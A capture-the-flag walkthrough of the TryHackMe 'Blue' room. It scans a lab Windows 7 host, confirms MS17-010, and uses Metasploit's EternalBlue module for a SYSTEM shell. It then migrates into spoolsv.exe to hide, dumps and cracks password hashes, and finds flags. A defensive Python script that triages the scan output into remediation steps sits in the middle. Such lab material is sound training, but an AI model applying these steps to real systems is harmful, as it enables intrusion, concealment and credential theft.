TryHackMe - Blue

The room link can be found at TryHackMe - Blue

For this room, I will be using the Metasploit framework.

Recon

We begin with an Nmap scan of the box to enumerate the running services and their versions.

msf5 > db_nmap -sC -sV 10.10.47.219

Now we can see all the running services with the services command.

msf5 > services
Services
========

host           port   proto  name               state  info
----           ----   -----  ----               -----  ----
10.10.47.219   135    tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   139    tcp    netbios-ssn        open   Microsoft Windows netbios-ssn
10.10.47.219   445    tcp    microsoft-ds       open   Windows 7 Professional 7601 Service Pack 1 microsoft-ds workgroup: WORKGROUP
10.10.47.219   3389   tcp    ssl/ms-wbt-server  open
10.10.47.219   49152  tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   49153  tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   49154  tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   49158  tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   49160  tcp    msrpc              open   Microsoft Windows RPC

On this machine, we will focus on the SMB service, which listens on port 445.

We can gather more information with the module auxiliary/scanner/smb/smb_version. After running it, the services entry for port 445 will look more like this.

10.10.47.219  445    tcp    smb                open   Windows 7 Professional SP1 (build:7601) (name:JON-PC) (workgroup:WORKGROUP ) (signatures:optional)

We also run auxiliary/scanner/smb/smb1 to check whether the box supports SMBv1.

msf5 auxiliary(scanner/smb/smb1) > run

[+] 10.10.47.219:445      - 10.10.47.219 supports SMBv1 dialect.
[*] 10.10.47.219:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As the machine name implies, the box could be exploitable via EternalBlue. Since it runs Windows 7 with SMBv1 enabled, it is most likely vulnerable. You can read more at Microsoft - EternalBlue.

We can check if the machine is vulnerable by running the module auxiliary/scanner/smb/smb_ms17_010.

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.47.219:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.47.219:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
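From a defender's point of view, the three outputs above (the services table, the SMBv1 check and the MS17-010 check) are exactly what an internal scan should turn into a remediation list. The following added example is my own helper, not code from the room or from Metasploit: it parses a services table and the [+] lines of the two scanner modules, rates each host, and lists the fixes. The second host 10.10.47.220, the regular expressions and all function names are constructed for illustration; the sample text mirrors the output shown in this write-up.

```python
"""Triage Metasploit `services` and SMB scanner output into a remediation list.

Constructed example (not part of TryHackMe Blue or of Metasploit).
"""
import re
from dataclasses import dataclass

# Constructed sample: the first host mirrors the write-up; 10.10.47.220 is an
# invented host with SMB signing required and no SMBv1, for contrast.
SERVICES_OUTPUT = """\
host           port   proto  name               state  info
----           ----   -----  ----               -----  ----
10.10.47.219   135    tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   445    tcp    smb                open   Windows 7 Professional SP1 (build:7601) (name:JON-PC) (workgroup:WORKGROUP ) (signatures:optional)
10.10.47.219   3389   tcp    ssl/ms-wbt-server  open
10.10.47.220   445    tcp    smb                open   Windows 10 Pro (build:19041) (name:WS-02) (workgroup:WORKGROUP ) (signatures:required)
"""

# Constructed sample of the [+] lines printed by smb1 and smb_ms17_010.
SCANNER_OUTPUT = """\
[+] 10.10.47.219:445      - 10.10.47.219 supports SMBv1 dialect.
[*] 10.10.47.219:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.47.219:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] Auxiliary module execution completed
"""

# host, port, proto, name, state, optional info column
SERVICE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s*(.*)$")
# only [+] findings carry a host:port followed by the message
SCANNER_RE = re.compile(r"^\[\+\]\s+(\S+):(\d+)\s+-\s+(.*)$")


@dataclass
class HostFinding:
    host: str
    smb_open: bool = False
    os_info: str = ""
    signing_required: bool = False
    smbv1: bool = False
    ms17_010_likely: bool = False

    def risk(self) -> str:
        """Rate the host; a likely MS17-010 hit outranks everything else."""
        if self.ms17_010_likely:
            return "critical"
        if self.smb_open and self.smbv1:
            return "high"
        if self.smb_open and not self.signing_required:
            return "medium"
        return "low" if self.smb_open else "info"

    def recommendations(self) -> list:
        recs = []
        if self.ms17_010_likely:
            recs.append("Apply the MS17-010 security update (or retire the host).")
        if self.smbv1:
            recs.append("Disable the SMBv1 server component.")
        if self.smb_open and not self.signing_required:
            recs.append("Require SMB signing.")
        if self.smb_open:
            recs.append("Restrict TCP/445 to trusted networks at the host firewall.")
        return recs


def parse_services(text: str) -> dict:
    """Build one HostFinding per host from a `services` table."""
    findings = {}
    for line in text.splitlines():
        m = SERVICE_RE.match(line)
        if not m:  # header and separator rows have no numeric port
            continue
        host, port, _proto, _name, state, info = m.groups()
        finding = findings.setdefault(host, HostFinding(host))
        if port == "445" and state == "open":
            finding.smb_open = True
            finding.os_info = info
            finding.signing_required = "signatures:required" in info
    return findings


def apply_scanner_output(findings: dict, text: str) -> dict:
    """Mark SMBv1 support and likely MS17-010 exposure from [+] lines."""
    for line in text.splitlines():
        m = SCANNER_RE.match(line)
        if not m:
            continue
        host, _port, msg = m.groups()
        finding = findings.setdefault(host, HostFinding(host))
        if "supports SMBv1 dialect" in msg:
            finding.smbv1 = True
        if "likely VULNERABLE to MS17-010" in msg:
            finding.ms17_010_likely = True
    return findings


def triage(services_text: str, scanner_text: str) -> dict:
    return apply_scanner_output(parse_services(services_text), scanner_text)


def report(findings: dict) -> str:
    lines = []
    for host in sorted(findings):
        f = findings[host]
        lines.append(f"{host}: risk={f.risk()} smbv1={f.smbv1} ms17-010={f.ms17_010_likely}")
        lines.extend(f"  - {rec}" for rec in f.recommendations())
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(triage(SERVICES_OUTPUT, SCANNER_OUTPUT)))
```

On the sample data the Windows 7 host comes out as critical with three fixes, while the contrast host only gets the generic advice to restrict port 445. The "likely VULNERABLE" wording is kept deliberately: the scanner infers exposure from the SMB dialogue rather than exploiting it, so a patch-state check on the host itself should confirm before the ticket is closed.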


Gain Access

Now we search for an exploit we can use in Metasploit.

msf5 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Select it with use 2, set LHOST and RHOST, and run it. The exploit may fail several times, but it will succeed if you keep trying. You could also try setting the payload to generic/shell_reverse_tcp.

Now we have a meterpreter session on the box.

Escalate

If you only have a plain shell, you can use the post/multi/manage/shell_to_meterpreter module to upgrade it to a Meterpreter session.

If you have a meterpreter shell you can check who you are with:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Since we are NT AUTHORITY\SYSTEM, we have full administrative access to the box. With this privilege we can migrate into spoolsv.exe to hide our process, using the ps and migrate commands. Alternatively, run post/windows/manage/migrate spawns a notepad process and migrates into it.

Cracking

To crack the passwords we first need to dump them. There are two ways to do this: we can use the hashdump command and crack the hashes outside of Metasploit, or we can run the post module post/windows/gather/hashdump, which saves the hashes in the database, and then run auxiliary/analyze/crack_windows to crack them with John the Ripper. The challenge suggests using the wordlist rockyou.txt.

Find flags

To find the flags, use the Meterpreter search command with the file name pattern, starting from the root directory.

meterpreter > search -f flag*